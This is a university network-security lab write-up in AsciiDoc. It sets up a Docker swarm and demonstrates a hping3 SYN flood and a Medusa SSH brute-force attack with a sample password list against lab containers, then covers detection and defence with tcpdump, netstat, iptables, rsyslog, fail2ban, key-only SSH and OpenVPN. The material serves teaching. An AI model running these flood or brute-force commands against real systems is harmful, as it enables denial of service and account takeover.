You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
732 lines
17 KiB
732 lines
17 KiB
= Εργασία Χειμερινού Εξαμήνου 2020-21
|
|
|
|
// Metadata:
|
|
:description: Intro and Install
|
|
:keywords: sec, swarm. docker
|
|
:data-uri:
|
|
:toc: right
|
|
:toc-title: Πίνακας περιεχομένων
|
|
:toclevels: 4
|
|
:source-highlighter: highlight
|
|
:icons: font
|
|
:sectnums:
|
|
|
|
Μάθημα: Ασφάλεια Δικτύων και Επικοινωνίων +
|
|
Ονοματεπώνυμο: Χρυσούλα Κούτκου +
|
|
Αριθμός Μητρώου: 71344742
|
|
|
|
{empty} +
|
|
|
|
== Docker Installation (Ubuntu)
|
|
|
|
```
|
|
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
|
|
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
|
|
sudo apt update
|
|
|
|
sudo apt install -y docker-ce
|
|
echo "or"
|
|
sudo apt install docker*
|
|
|
|
sudo systemctl status docker
|
|
sudo usermod -aG docker username #οπου username το όνομα του χρήστη που θα δουλεύει με docker
|
|
```
|
|
|
|
|
|
[[cheat-compose]]
|
|
== docker-compose
|
|
|
|
```
|
|
sudo curl -L "https://github.com/docker/compose/releases/download/1.24.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
|
|
sudo chmod +x /usr/local/bin/docker-compose
|
|
sudo ln -s /usr/local/bin/docker-compose /usr/bin/docker-compose
|
|
```
|
|
|
|
|
|
[[cheat-error]]
|
|
== On Error:
|
|
|
|
- run
|
|
|
|
```
|
|
$ sudo su
|
|
# touch set-ca.sh
|
|
```
|
|
- copy-paste lines
|
|
|
|
```
|
|
registry_address=registry.vlabs.uniwa.gr
|
|
registry_port=5043
|
|
mkdir -p /etc/docker/certs.d/$registry_address:$registry_port
|
|
openssl s_client -showcerts -connect $registry_address:$registry_port < /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /etc/docker/certs.d/$registry_address:$registry_port/ca.crt
|
|
registry_port=5080
|
|
mkdir -p /etc/docker/certs.d/$registry_address:$registry_port
|
|
openssl s_client -showcerts -connect $registry_address:$registry_port < /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /etc/docker/certs.d/$registry_address:$registry_port/ca.crt
|
|
|
|
registry_address=hub.swarmlab.io
|
|
registry_port=5443
|
|
mkdir -p /etc/docker/certs.d/$registry_address:$registry_port
|
|
openssl s_client -showcerts -connect $registry_address:$registry_port < /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /etc/docker/certs.d/$registry_address:$registry_port/ca.crt
|
|
|
|
registry_port=5480
|
|
mkdir -p /etc/docker/certs.d/$registry_address:$registry_port
|
|
openssl s_client -showcerts -connect $registry_address:$registry_port < /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /etc/docker/certs.d/$registry_address:$registry_port/ca.crt
|
|
|
|
```
|
|
|
|
=== exec file
|
|
|
|
```
|
|
sudo bash ./set-ca.sh
|
|
```
|
|
|
|
{empty} +
|
|
|
|
== Install swarmlab-sec (Home PC)
|
|
|
|
- Clone repo https://git.swarmlab.io:3000/swarmlab/swarmlab-sec[^] +
|
|
|
|
== Usage (swarmlab-sec)
|
|
|
|
|
|
- Open a console
|
|
|
|
- cd to swarmlab-sec
|
|
|
|
- Create a directory
|
|
|
|
```
|
|
cd <dir>
|
|
|
|
../install/usr/share/swarmlab.io/sec/swarmlab-sec
|
|
|
|
create create project (swarmlab-sec create)
|
|
up start swarmlab-sec (swarmlab-sec up size=10)
|
|
scale resize swarmlab-sec (swarmlab-sec scale size=30)
|
|
reload rebuild image (swarmlab-sec reload size=15)
|
|
login login swarmlab-sec (swarmlab-sec login)
|
|
exec execute command (swarmlab-sec exec [SHELL COMMAND])
|
|
down stop swarmlab-sec (swarmlab-sec down)
|
|
clean clean project (swarmlab-sec clean)
|
|
list show instances (swarmlab-sec swarmlab-sec list)
|
|
help show help (swarmlab-sec help)
|
|
```
|
|
|
|
|
|
[[cheat-swarmlab-create]]
|
|
== Create swarmlab project
|
|
|
|
```
|
|
mkdir project
|
|
cd project
|
|
../install/usr/share/swarmlab.io/sec/swarmlab-sec create
|
|
```
|
|
.Relevant files:
|
|
```
|
|
Project
|
|
├── Dockerfile # Image specification
|
|
├── project # Sample program source code
|
|
│ └── hello_world.c
|
|
├── ssh # keys for accessing
|
|
│ ├── id_rsa # (could generate your own)
|
|
│ └── id_rsa.pub
|
|
├── docker-compose.yml # Container orchestration
|
|
```
|
|
|
|
[[cheat-swarmlab-up]]
|
|
== Spin up the swarmlab cluster
|
|
|
|
```
|
|
cd project
|
|
../install/usr/share/swarmlab.io/sec/swarmlab-sec up size=5
|
|
```
|
|
|
|
[[cheat-swarmlab-up1]]
|
|
== Login to the swarmlab cluster
|
|
|
|
```
|
|
cd project
|
|
../install/usr/share/swarmlab.io/sec/swarmlab-sec login
|
|
```
|
|
|
|
User password: docker
|
|
|
|
Sudo password: docker
|
|
|
|
== Inside on Docker Master
|
|
First of all, type ifconfig to see your ip address. Then, create an inventory.yml with the IPs using nmap -sP 172.19.0.* | grep Nmap | cut -d' ' -f5-6
|
|
|
|
```
|
|
[service]
|
|
172.27.0.2
|
|
172.27.0.3
|
|
172.27.0.4
|
|
172.27.0.5
|
|
172.27.0.6
|
|
|
|
```
|
|
Afterwards, you have to create a test.yml file.
|
|
|
|
```
|
|
---
|
|
- hosts: service
|
|
remote_user: docker
|
|
gather_facts: no
|
|
vars:
|
|
user: "docker"
|
|
|
|
tasks:
|
|
# -----------------
|
|
# make directory
|
|
# -----------------
|
|
- name: make dir for data
|
|
become: true
|
|
file:
|
|
path: "/var/lab/playground/playground-readmongo"
|
|
state: directory
|
|
owner: docker
|
|
group: docker
|
|
mode: '0777'
|
|
|
|
# - name: google.com
|
|
# become: yes
|
|
# become_user: "{{ user }}"
|
|
# command: curl http://www.google.com
|
|
# ignore_errors: yes
|
|
# register: configwww
|
|
#
|
|
# - name: ls configwww
|
|
# debug: var=configwww.stdout_lines
|
|
|
|
- name: ls -al /var/lab/playground/playground-readmongo/
|
|
become: yes
|
|
become_user: "{{ user }}"
|
|
#command: ls -al /var/lab/playground/playground-readmongo
|
|
command: ls -al /etc
|
|
ignore_errors: yes
|
|
register: config
|
|
|
|
- name: ls config
|
|
debug: var=config.stdout_lines
|
|
#
|
|
# - name: Refresh connection
|
|
# meta: clear_host_errors
|
|
```
|
|
Then, create a run.sh script.
|
|
|
|
```
|
|
ansible-playbook -u docker -i inventory.yml test.yml -f 5 --ask-pass --ask-become-pass
|
|
|
|
```
|
|
In your command line, type:
|
|
|
|
```
|
|
chmod +x run.sh
|
|
sudo apt install ansible
|
|
./run.sh
|
|
|
|
(Somewhere here there would be some errors)
|
|
sudo apt install sshpass
|
|
|
|
cd /etc/ansible
|
|
vi ansible.cfg
|
|
(Add this line)
|
|
host_key_checking = False
|
|
(Exit and return back)
|
|
./run.sh
|
|
|
|
```
|
|
== Hping3 Attack
|
|
|
|
{empty} +
|
|
Here is a video about hping3, tcpdump, netstat and iptables rules. Feel free to press like button and subscribe!
|
|
|
|
video::lErpyiAbsVs[youtube]
|
|
|
|
{empty} +
|
|
|
|
Firstly, connect to the worker that you wish to do the attack. Inside the worker create a script file with these:
|
|
|
|
```
|
|
#!/bin/sh
|
|
#installation_of_hping3
|
|
sudo apt update
|
|
sudo apt install hping3 -y
|
|
|
|
#syn_flood_attack_with_hping3_on_docker_master_with_IP_172.19.0.2
|
|
#hping3 -i u1 -S -p 80 172.27.0.2
|
|
#hping3 172.27.0.2 -q -n -d 120 -S -p 80 --flood
|
|
hping3 -S -p 80 172.127.0.2
|
|
|
|
```
|
|
In your command line type:
|
|
|
|
```
|
|
chmod +x hping3.sh
|
|
sudo ./hping3.sh
|
|
|
|
```
|
|
== Tcpdump on the victim
|
|
|
|
After connecting to the victim's host, then create a script file tcpdump.sh
|
|
|
|
```
|
|
#!/bin/sh
|
|
tcpdump port 80
|
|
#tcpdump -Nnn -i any -s0 'tcp[13] & 2 !=0'
|
|
|
|
```
|
|
In your command line type:
|
|
|
|
```
|
|
chmod +x tcpdump.sh
|
|
sudo ./tcpdump.sh
|
|
|
|
```
|
|
== Netstat on the victim
|
|
|
|
Create a netstat.sh script file and type the above:
|
|
|
|
```
|
|
#!/bin/sh
|
|
|
|
netstat -npt | awk '{print $6}' | sort | uniq -c | sort -nr | head
|
|
netstat -anp | grep 'tcp\udp' | awk '{print $6}' | cut -d: f1 | sort | uniq -c | sort -n
|
|
netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
|
|
netstat -na
|
|
netstat -tna
|
|
netstat -antlupe
|
|
netstat -n -p | grep SYN_REC | wc -l
|
|
netstat -npt | awk '{print $6}' | sort | uniq -c | sort -nr | head
|
|
|
|
```
|
|
In your command line type:
|
|
|
|
```
|
|
chmod +x netstat.sh
|
|
sudo ./netstat.sh
|
|
|
|
```
|
|
== Anti-Ddos protection using iptables
|
|
|
|
Create an anti-ddos.sh file and type inside:
|
|
|
|
```
|
|
#!/bin/sh
|
|
#drop invalid packets
|
|
iptables -A INPUT -m state --state INVALID -j DROP
|
|
iptables -A FORWARD -m state --state INVALID -j DROP
|
|
iptables -A OUTPUT -m state --state INVALID -j DROP
|
|
|
|
#Use SYNPROXY on all ports (disables connection limiting rule) ###
|
|
iptables -t raw -A PREROUTING -p tcp -m tcp --syn -j CT --notrack
|
|
iptables -A INPUT -p tcp -m tcp -m conntrack --ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7 --mss 1460
|
|
iptables -A INPUT -m conntrack --ctstate INVALID -j DROP
|
|
|
|
```
|
|
In your command line type:
|
|
|
|
```
|
|
chmod +x anti-ddos.sh
|
|
sudo ./anti-ddos.sh
|
|
|
|
```
|
|
== SSH Brute Force Attack using Medusa
|
|
|
|
{empty} +
|
|
Here is a video about ssh brute force attack using medusa tool, detection using rsyslog and protection using fail2ban
|
|
|
|
video::6C8suUjJBCA[youtube]
|
|
|
|
{empty} +
|
|
|
|
In order to do this attack, you have to create a password list file. For example,
|
|
|
|
```
|
|
123password
|
|
root
|
|
admin-root
|
|
acbdef2147
|
|
whatistherealpassword
|
|
docker
|
|
password
|
|
123456789
|
|
|
|
```
|
|
The next step is to create a medusa.sh script file.
|
|
|
|
```
|
|
#!/bin/bash
|
|
sudo apt update
|
|
sudo apt install medusa
|
|
medusa -u docker -P pass.txt -h 172.27.0.3 -M ssh
|
|
|
|
```
|
|
To accomplish the ssh brute force attack I connected as worker_4 and I will attack the worker_1.
|
|
|
|
In your command line type:
|
|
|
|
```
|
|
chmod +x medusa.sh
|
|
sudo ./medusa.sh
|
|
|
|
```
|
|
== Detection of SSH Brute Force using rsyslog tool
|
|
|
|
I will connect as worker_1 and I will create a rsyslog.sh file.
|
|
|
|
```
|
|
#!/bin/bash
|
|
sudo apt update
|
|
sudo apt install rsyslog
|
|
sudo service rsyslog start
|
|
sudo service rsyslog status
|
|
sudo grep "Failed password" /var/log/auth.log
|
|
|
|
```
|
|
In your command line type:
|
|
|
|
```
|
|
chmod +x rsyslog.sh
|
|
sudo ./rsyslog.sh
|
|
(After results are shown type the next line)
|
|
sudo service rsyslog stop
|
|
```
|
|
== Fail2ban tool for SSH protection
|
|
|
|
Create a fail2ban.sh file and type the below:
|
|
```
|
|
#!/bin/bash
|
|
sudo apt update
|
|
sudo apt install fail2ban
|
|
|
|
```
|
|
In your command line type:
|
|
|
|
```
|
|
chmod +x fail2ban.sh
|
|
sudo ./fail2ban.sh
|
|
|
|
```
|
|
```
|
|
sudo service fail2ban start
|
|
sudo service fail2ban status
|
|
cd /etc/fail2ban
|
|
cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
|
|
|
|
(Inside the jail.local type the below)
|
|
|
|
[DEFAULT]
|
|
loglevel = DEBUG
|
|
logtarget = path_to_log
|
|
|
|
[sshd]
|
|
enabled = true
|
|
maxretry = 2
|
|
bantime = 600
|
|
findtime = 30
|
|
logpath = %(sshd_log)s
|
|
backend = %(sshd_backend)s
|
|
action = iptables-multiport[name=%(__name__)s, bantime="%(bantime)s, port=ssh, protocol="%(protocol)s", chain=INPUT]
|
|
|
|
```
|
|
|
|
In your command line type:`
|
|
```
|
|
sudo service fail2ban restart
|
|
sudo service fail2ban status
|
|
sudo fail2ban-client start
|
|
sudo fail2ban-client status
|
|
sudo fail2ban-client status sshd
|
|
|
|
```
|
|
== SSH Brute authentication only with keys
|
|
|
|
|
|
To accomplish this brute force login with only key you have to connect to a container, for instance I connected to worker_5.
|
|
|
|
In your command line type:`
|
|
```
|
|
(Our server is worker_5)
|
|
|
|
mkdir .ssh
|
|
cd .ssh
|
|
ssh-keygen
|
|
cat ~/.ssh/id_rsa.pub
|
|
|
|
(You should do the below for every worker, but for this example I will do only about worker_4)
|
|
|
|
ssh-copy-id docker@172.27.0.5
|
|
|
|
(Then it will ask you to connect)
|
|
|
|
ssh docker@172.27.0.5
|
|
|
|
(After doing this to all remaining containers type the next below for each host)
|
|
|
|
scp id_rsa docker@172.27.0.5 #copy id_rsa to every container
|
|
sudo service ssh restart
|
|
|
|
```
|
|
Then you have to disable password authentication on you server.
|
|
|
|
```
|
|
(Being on server)
|
|
|
|
cd /etc/ssh
|
|
vi sshd_config
|
|
|
|
(Inside sshd_config change the below)
|
|
|
|
PasswordAuthentication no
|
|
|
|
(After doing this return to your command line and type the below)
|
|
|
|
sudo service ssh restart
|
|
|
|
```
|
|
And finally you are ready!
|
|
|
|
|
|
== VPN
|
|
|
|
{empty} +
|
|
Here is a video about how you can create VPN and provide services to docker swarm.
|
|
|
|
video::FnRMonM07yQ[youtube]
|
|
|
|
{empty} +
|
|
|
|
In this part, I will show you how you can create a VPN and and provide services to the docker swarm. Firstly, you shoudld be on the /swarmlab-sec/project folder and create a vpn folder.
|
|
|
|
```
|
|
cd swarmlab-sec/project
|
|
mkdir vpn
|
|
cd vpn
|
|
|
|
```
|
|
The next step is to create a create-vpn. script.
|
|
|
|
```
|
|
#!/bin/bash
|
|
IP=127.0.0.1 # Server IP
|
|
P=1194 # Server Port
|
|
OVPN_SERVER='10.80.0.0/16' # VPN Network
|
|
|
|
#vpn_data=/var/lib/swarmlab/openvpn/openvpn-services/ # Dir to save data ** this must exist **
|
|
vpn_data=$PWD/openvpn-services/
|
|
if [ ! -d $vpn_data ]; then
|
|
mkdir -p $vpn_data
|
|
fi
|
|
|
|
NAME=swarmlab-vpn-services # name of docker service
|
|
DOCKERnetwork=swarmlab-vpn-services-network # docker network
|
|
docker=registry.vlabs.uniwa.gr:5080/myownvpn # docker image
|
|
|
|
docker stop $NAME #stop container
|
|
sleep 1
|
|
docker container rm $NAME #rm container
|
|
|
|
# rm config files
|
|
rm -f $vpn_data/openvpn.conf.*.bak
|
|
rm -f $vpn_data/openvpn.conf
|
|
rm -f $vpn_data/ovpn_env.sh.*.bak
|
|
rm -f $vpn_data/ovpn_env.sh
|
|
|
|
# create network
|
|
sleep 1
|
|
docker network create --attachable=true --driver=bridge --subnet=172.50.0.0/16 --gateway=172.50.0.1 $DOCKERnetwork
|
|
|
|
#run container see ovpn_genconfig
|
|
docker run --net=none -it -v $vpn_data:/etc/openvpn -p 1194:1194 --rm $docker ovpn_genconfig -u udp://$IP:1194 \
|
|
-N -d -c -p "route 172.50.20.0 255.255.255.0" -e "topology subnet" -s $OVPN_SERVER
|
|
|
|
# create pki see ovpn_initpki
|
|
docker run --net=none -v $vpn_data:/etc/openvpn --rm -it $docker ovpn_initpki
|
|
|
|
# see ovpn_copy_server_files
|
|
#docker run --net=none -v $vpn_data:/etc/openvpn --rm $docker ovpn_copy_server_files
|
|
|
|
#create vpn see --cap-add=NET_ADMIN
|
|
sleep 1
|
|
docker run --detach --name $NAME -v $vpn_data:/etc/openvpn --net=$DOCKERnetwork --ip=172.50.0.2 -p $P:1194/udp --cap-add=NET_ADMIN $docker
|
|
|
|
sudo sysctl -w net.ipv4.ip_forward=1
|
|
|
|
#show created
|
|
docker ps
|
|
|
|
```
|
|
create-user.sh
|
|
|
|
```
|
|
USERNAME=user1
|
|
vpn_data=$PWD/openvpn-services/
|
|
docker=registry.vlabs.uniwa.gr:5080/myownvpn
|
|
|
|
docker run -v $vpn_data:/etc/openvpn --rm -it $docker easyrsa build-client-full $USERNAME nopass
|
|
docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm $docker ovpn_getclient $USERNAME > $USERNAME.user
|
|
|
|
```
|
|
After the user is created add in the $USERNAME.user the below:
|
|
|
|
```
|
|
client
|
|
nobind
|
|
dev tun
|
|
comp-lzo
|
|
resolv-retry infinite
|
|
keepalive 15 60
|
|
|
|
remote-cert-tls server
|
|
remote 10.0.2.15 1194 udp #type your host IP address in every $USERNAME.user
|
|
float
|
|
|
|
```
|
|
rm-user.sh
|
|
|
|
```
|
|
#!/bin/bash
|
|
|
|
CLIENTNAME=test1
|
|
U=$CLIENTNAME
|
|
|
|
vpn_data=$PWD/openvpn-services/
|
|
docker=registry.vlabs.uniwa.gr:5080/myownvpn
|
|
|
|
rm -f $vpn_data/pki/reqs/$CLIENTNAME.req
|
|
rm -f $vpn_data/pki/private/$CLIENTNAME.key
|
|
rm -f $vpn_data/pki/issued/$CLIENTNAME.crt
|
|
rm -f $vpn_data/server/ccd/$CLIENTNAME
|
|
rm -f $vpn_data/ccd/$CLIENTNAME
|
|
pem=$(sudo grep "CN=$U$" $vpn_data/pki/index.txt | cut -f4)
|
|
|
|
rm -f $vpn_data/pki/certs_by_serial/$pem.pem
|
|
sed -i "/CN=$U$/d" $vpn_data/pki/index.txt
|
|
echo $pem
|
|
docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm -it $docker ovpn_revokeclient $CLIENTNAME remove
|
|
|
|
rm -f $vpn_data_user_config/$CLIENTNAME.ovpn
|
|
rm -f $vpn_data_user_config1/$CLIENTNAME.ovpn
|
|
|
|
```
|
|
show-user.sh
|
|
|
|
```
|
|
NAME=swarmlab-vpn-services # name of docker service
|
|
docker exec -it $NAME ovpn_listclients
|
|
|
|
```
|
|
show-conn-user.sh
|
|
|
|
```
|
|
NAME=swarmlab-vpn-services # name of docker service
|
|
docker exec -it $NAME cat /tmp/openvpn-status.log
|
|
|
|
```
|
|
Then you have to type in your command line:
|
|
|
|
```
|
|
chmod +x create-vpn.sh
|
|
chmod +x create-user.sh
|
|
chmod +x show-user.sh
|
|
chmod +x rm-user.sh
|
|
chmod +x show-conn-user.sh
|
|
|
|
./create-vpn.sh
|
|
./create-user.sh #for every user you have to use a different name
|
|
./show-user.sh #you can see all the users
|
|
./show-conn-user.sh #you can see all connected users to the vpn
|
|
|
|
cp $USERNAME.user ../project #this user will be copied to the master
|
|
```
|
|
After doing these steps, connect to a docker host, for instance in docker master.
|
|
|
|
```
|
|
sudo apt update
|
|
sudo apt install openvpn
|
|
ls -al #to check if there is the user1.user file
|
|
sudo su
|
|
service openvpn start
|
|
openvpn --config ./user1.user #client connection to the VPN
|
|
|
|
```
|
|
Don't close the window or do not stop the execution. Open a new window and connect to the same user and type ifconfig to check if the tun0 has created.
|
|
|
|
|
|
Now connect to an other worker, for instance worker_1. You have to do the same thing in every worker.
|
|
|
|
```
|
|
ssh docker@@172.27.0.3
|
|
|
|
sudo apt update
|
|
sudo apt install openvpn
|
|
touch user2.user
|
|
vi user2.user #copy the user2.user file from the /swarmlab-sec/project/vpn/ and paste it here
|
|
|
|
ls -al #to check if there is the user1.user file
|
|
sudo su
|
|
service openvpn start
|
|
openvpn --config ./user2.user #client connection to the VPN
|
|
|
|
```
|
|
You have to do the same procedure for the other workers.
|
|
|
|
Don't close the window or do not stop the execution. Open a new window and connect to the same user and type ifconfig to check if the tun0 has created.
|
|
|
|
Then in docker master tab type:
|
|
|
|
```
|
|
sudo su
|
|
tcpdump -i tun0
|
|
|
|
```
|
|
Go to the new docker worker tab and type:
|
|
|
|
```
|
|
ping 10.80.0.2 #this is the new IP of master of tun0
|
|
|
|
```
|
|
|
|
You are ready!
|
|
|
|
|
|
== VPN
|
|
|
|
{empty} +
|
|
Here is a video about how you can do ssh local and remote forwarding.
|
|
|
|
video::gbegXj8pQxs[youtube]
|
|
|
|
{empty} +
|
|
|
|
On remote container
|
|
|
|
```
|
|
sudo apt install nginx
|
|
curl localhost #to check if localhost is working
|
|
hostname -i
|
|
|
|
```
|
|
On localhost host
|
|
|
|
```
|
|
curl localhost #to check if localhost is working
|
|
hostname
|
|
hostname -i
|
|
|
|
sudo ssh -nNT -L 80:localhost:80 docker@172.27.0.2
|
|
|
|
```
|
|
Then type on localhost host again in a new tab:
|
|
|
|
```
|
|
curl localhost #to check if localhost is working
|
|
|
|
```
|
|
And it works! +
|
|
|
|
|
|
Please enjoy and thank you for reading my ascii doc and watching my youtube videos!
|
|
|
|
|
|
|